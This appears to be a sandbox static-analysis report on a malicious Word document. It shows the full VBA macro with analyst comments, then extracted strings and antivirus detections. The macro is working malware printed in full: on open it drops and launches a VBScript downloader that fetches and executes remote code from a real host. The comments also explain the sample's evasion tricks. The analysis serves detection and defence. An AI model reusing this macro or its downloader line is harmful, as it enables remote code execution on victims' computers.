Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: removes the shape named by nShape from the active document and
' then un-hides all text in the document.
'   nShape - name/index of the shape to delete (AutoOpen passes "pic").
' Presumably "pic" is a lure image ("enable content") covering the real body
' text, which is stored with the Hidden font attribute - confirm against the
' document itself.
Sub ViewPage(nShape)
    ' Every failure below is silently ignored (e.g. the shape does not exist).
    On Error Resume Next
    Set doc = ActiveDocument
    Set sel = doc.Shapes(nShape)
    sel.Fill.Solid
    sel.Delete
    ' Walk SeekView values 10 down to 0 (Word's WdSeekView range: headers,
    ' footers, notes, main text) and clear Font.Hidden on the whole story in each.
    For ViewMode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = ViewMode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

' Analyst note: drops a one-line VBScript downloader to disk and launches it.
'   resp - directory in which the script file is written (AutoOpen passes the
'          Path of a Word template).
' Detection pointers grounded in this routine: a text file named
' 1589989024.xml written by Word into that directory; wscript.exe started with
' "//e:vbscript //b" against a non-.vbs file; an outbound HTTP GET from
' wscript.exe to the host held in ui.
Sub MainPage(resp)
    ' A scratch document is used only as a way to write the script text to disk.
    Documents.Add
    ' Stage-2 script: synchronous GET via Microsoft.XMLHTTP, then Execute() on
    ' the response body, i.e. it runs whatever VBScript the server returns.
    hs = "On Error Resume Next:Set mx = CreateObject(""Microsoft.XMLHTTP""):mx.open ""GET"", ""http://xxx/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"
    ' Host/path is kept apart from the URL template and spliced in at run time,
    ' so the full URL never appears as a single literal (presumably to defeat
    ' simple string matching).
    ui = "sendlucky.scienceontheweb.net/ben/chads"
    hs = Replace(hs, "xxx", ui)
    ' The file has an .xml extension although its content is VBScript.
    rp = resp & "\1589989024.xml"
    ActiveDocument.Range.Text = hs
    ActiveDocument.SaveAs2 FileName:=rp, FileFormat:=wdFormatText
    ActiveDocument.Close
    ' Process creation goes through WMI (Win32_Process.Create) rather than
    ' Shell. Processes started this way normally run under the WMI provider
    ' host instead of as a child of WINWORD.EXE, so parent/child rules keyed
    ' on Word alone will not see it.
    Set wmObj = GetObject("winmgmts:win32_process")
    ' //e:vbscript forces the VBScript engine regardless of the file
    ' extension; //b is batch mode (no prompts or error dialogs).
    wmObj.Create "wscript.exe //e:vbscript //b " & rp
End Sub

' Analyst note: entry point. Word runs a macro named AutoOpen automatically
' when the document is opened with macros enabled. It unlocks and rewrites the
' lure document, then hands a template directory to MainPage, which drops and
' starts the downloader script.
Sub AutoOpen()
    ' All errors are suppressed so the user sees no failure dialog.
    On Error Resume Next
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    ' Document protection is removed with a hard-coded password; the string is
    ' a usable static indicator for this sample.
    wnd.Unprotect "1qaz2wsx"
    ViewPage ("pic")
    ' The document is saved after ViewPage has changed it, so the copy left on
    ' disk no longer matches the delivered file (hash and lure shape differ).
    wnd.Save
    Set ob_tmp = Application.Templates
    Dim tmp As Template
    ' Type = 0 corresponds to wdNormalTemplate in Word's WdTemplateType
    ' enumeration, so the drop directory is the folder holding the Normal
    ' template. Only the first match is used.
    For Each tmp In ob_tmp
    If tmp.Type = 0 Then
        MainPage (tmp.Path)
        Exit For
    End If
    Next
End Sub






                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: removes the shape named by nShape from the active document and
' then un-hides all text in the document.
'   nShape - name/index of the shape to delete (AutoOpen passes "pic").
' Presumably "pic" is a lure image ("enable content") covering the real body
' text, which is stored with the Hidden font attribute - confirm against the
' document itself.
Sub ViewPage(nShape)
    ' Every failure below is silently ignored (e.g. the shape does not exist).
    On Error Resume Next
    Set doc = ActiveDocument
    Set sel = doc.Shapes(nShape)
    sel.Fill.Solid
    sel.Delete
    ' Walk SeekView values 10 down to 0 (Word's WdSeekView range: headers,
    ' footers, notes, main text) and clear Font.Hidden on the whole story in each.
    For ViewMode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = ViewMode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

' Analyst note: drops a one-line VBScript downloader to disk and launches it.
'   resp - directory in which the script file is written (AutoOpen passes the
'          Path of a Word template).
' Detection pointers grounded in this routine: a text file named
' 1589989024.xml written by Word into that directory; wscript.exe started with
' "//e:vbscript //b" against a non-.vbs file; an outbound HTTP GET from
' wscript.exe to the host held in ui.
Sub MainPage(resp)
    ' A scratch document is used only as a way to write the script text to disk.
    Documents.Add
    ' Stage-2 script: synchronous GET via Microsoft.XMLHTTP, then Execute() on
    ' the response body, i.e. it runs whatever VBScript the server returns.
    hs = "On Error Resume Next:Set mx = CreateObject(""Microsoft.XMLHTTP""):mx.open ""GET"", ""http://xxx/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"
    ' Host/path is kept apart from the URL template and spliced in at run time,
    ' so the full URL never appears as a single literal (presumably to defeat
    ' simple string matching).
    ui = "sendlucky.scienceontheweb.net/ben/chads"
    hs = Replace(hs, "xxx", ui)
    ' The file has an .xml extension although its content is VBScript.
    rp = resp & "\1589989024.xml"
    ActiveDocument.Range.Text = hs
    ActiveDocument.SaveAs2 FileName:=rp, FileFormat:=wdFormatText
    ActiveDocument.Close
    ' Process creation goes through WMI (Win32_Process.Create) rather than
    ' Shell. Processes started this way normally run under the WMI provider
    ' host instead of as a child of WINWORD.EXE, so parent/child rules keyed
    ' on Word alone will not see it.
    Set wmObj = GetObject("winmgmts:win32_process")
    ' //e:vbscript forces the VBScript engine regardless of the file
    ' extension; //b is batch mode (no prompts or error dialogs).
    wmObj.Create "wscript.exe //e:vbscript //b " & rp
End Sub

' Analyst note: entry point. Word runs a macro named AutoOpen automatically
' when the document is opened with macros enabled. It unlocks and rewrites the
' lure document, then hands a template directory to MainPage, which drops and
' starts the downloader script.
Sub AutoOpen()
    ' All errors are suppressed so the user sees no failure dialog.
    On Error Resume Next
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    ' Document protection is removed with a hard-coded password; the string is
    ' a usable static indicator for this sample.
    wnd.Unprotect "1qaz2wsx"
    ViewPage ("pic")
    ' The document is saved after ViewPage has changed it, so the copy left on
    ' disk no longer matches the delivered file (hash and lure shape differ).
    wnd.Save
    Set ob_tmp = Application.Templates
    Dim tmp As Template
    ' Type = 0 corresponds to wdNormalTemplate in Word's WdTemplateType
    ' enumeration, so the drop directory is the folder holding the Normal
    ' template. Only the first match is used.
    For Each tmp In ob_tmp
    If tmp.Type = 0 Then
        MainPage (tmp.Path)
        Exit For
    End If
    Next
End Sub






                                    
On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "http://xxx/list.php?query=1", False:mx.Send:Execute(mx.responseText)'
sendlucky.scienceontheweb.net/ben/chads
\1589989024.xml
winmgmts:win32_process$
wscript.exe //e:vbscript //b
1qaz2wsx
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Custom
ViewPage
(nShape)
rror ResA
S@et doc
Fill.Sol
Dele6t
10 To
0 Step -
.See>k
Wi0th S
.Whole Story
nt.Hidde
.Co0llap
En|d A
]Maina
]respD]
RsH.Ad
c:Abmx
Object("
"Microso
ft.XMLHT
TP""):mx
.op@0""GE
T"", ""h
ttp://xx
x/list.p
hp?query
Sen@d:Exec@
,onseT
lucky.sc ience
web.net/
ben/chad&s
ce8(hs
"\158998
9024.xml
.Rangef.
aveAs2
eAw:=rp,
Nmat:=wd
winmgmts
32_pro`cess"
6 "wscri
pt.exe /`/e:vb
"`rp
uApplica`tion.#!
yp!lwdPri
wnd.Un
t N "1qazp2wsxd2
![ `("picf
ob_tmA<
d7Dim
Win64x
Project-
stdole
Normal
Office
ThisDocument<
_Evaluate
ViewPage
nShape
ActiveDocument
Shapes
Delete
ViewModeHDP
ActiveWindow
SeekView$
SelectionZ
WholeStory
Hidden]
Collapse
MainPager1P
Documents
Replacef
SaveAs2
FileNamej
FileFormat
wdFormatText
wmObjZ
GetObjectz
Create
AutoOpen
Application
wdPrintView(
Unprotect
ob_tmp
Templates
Template
Documentj
_B_var_wnd
_B_var_ob_tmp
_B_var_doc
_B_var_selw
_B_var_ViewMode
_B_var_hs8
_B_var_ui
_B_var_rp
_B_var_wmObjGaP
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
Shared\
OFFICE16
\MSO.DLL
M 16.0
ThisDocu
*\CNormalrU
Project
ThisDocument
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Office16\MSWORD.OLB
stdole
C:\Windows\System32\stdole2.tlb
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
Document
ViewPage
MainPage
AutoOpen
VBE7.DLL
nShape
3Rb<_*
dThisDocument
ID="{00000000-0000-0000-0000-000000000000}"
Document=ThisDocument/&H00000000
HelpFile=""
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="F6F45A0DAA17531B531B56205620"
DPB="A3A10FE0A1FDA1FD5E03A2FDE0FBB11687914802A9749FBD31B7C638815AC90A857467B589"
GC="5052FCFFFDFFFDFF"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=26, 26, 1026, 511,
bWv~+6
Root Entry
ThisDocument
__SRP_2
(1Normal.ThisDocument
$*\Rffff*0762ea7d0c
*\R1*#c7
*\R1*#71
*\R1*#c6
*\R1*#c0
*\R1*#d0
*\R1*#158
*\R1*#17b
*\R1*#c1
*\R1*#129
*\R1*#e3
*\R1*#c5
*\R0*#f
*\R1*#d4
*\R1*#43
*\R0*#17
*\G{000204EF-0__SRP_3
_VBA_PROJECT
__SRP_0
000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
ThisDocument
0762ea7d0c
ThisDocument
1qaz2wsx
Unprotect
Shapes
Delete
\1589989024.xmlL
On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "http://xxx/list.php?query=1", False:mx.Send:Execute(mx.responseText)
sendlucky.scienceontheweb.net/ben/chads
wscript.exe //e:vbscript //b
winmgmts:win32_process
Create
__SRP_1
PROJECTwm
PROJECT
tThisDocument
Antivirus Signature
Bkav Clean
Lionic Trojan.MSWord.SAgent.4!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal O97M.Downloader.44590
ALYac Trojan.Downloader.DOC.Gen
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-Macro.Save.635ac491
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Office.VBA_Macro_Heur
Cyren PP97M/Agent.AHO.gen!Eldorado
Symantec Trojan.Gen.NPE
ESET-NOD32 VBA/TrojanDropper.Agent.BWY
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.MSOffice.SAgent.gen
BitDefender VB:Trojan.Valyria.5201
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan VB:Trojan.Valyria.5201
Tencent Heur.Macro.Generic.g.751d73a2
Sophos Clean
Baidu Clean
F-Secure Malware.VBS/Drop.Agent.udrmb
DrWeb Clean
VIPRE VB:Trojan.Valyria.5201
TrendMicro Clean
McAfee-GW-Edition BehavesLike.OLE2.Downloader.mr
FireEye VB:Trojan.Valyria.5201
Emsisoft VB:Trojan.Valyria.5201 (B)
SentinelOne Static AI - Malicious OLE
Jiangmin Clean
Avira VBS/Drop.Agent.udrmb
MAX malware (ai score=100)
Antiy-AVL Trojan/MSOffice.SAgent.gen
Microsoft Trojan:X97M/Kimsuky!ic
Gridinsoft Clean
Xcitium Clean
Arcabit HEUR.VBA.CG.2
ViRobot DOC.Z.Agent.22016.AYI
ZoneAlarm HEUR:Trojan.MSOffice.SAgent.gen
GData VB:Trojan.Valyria.5201
Google Clean
AhnLab-V3 Downloader/DOC.Generic.S1649
Acronis Clean
McAfee W97M/Downloader.dsn
TACHYON Suspicious/X97M.XSR.Gen
VBA32 Clean
Zoner Clean
Rising Trojan.CodeLoader/VBA!1.DFBF (CLASSIC)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet VBA/Agent.A955!tr
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.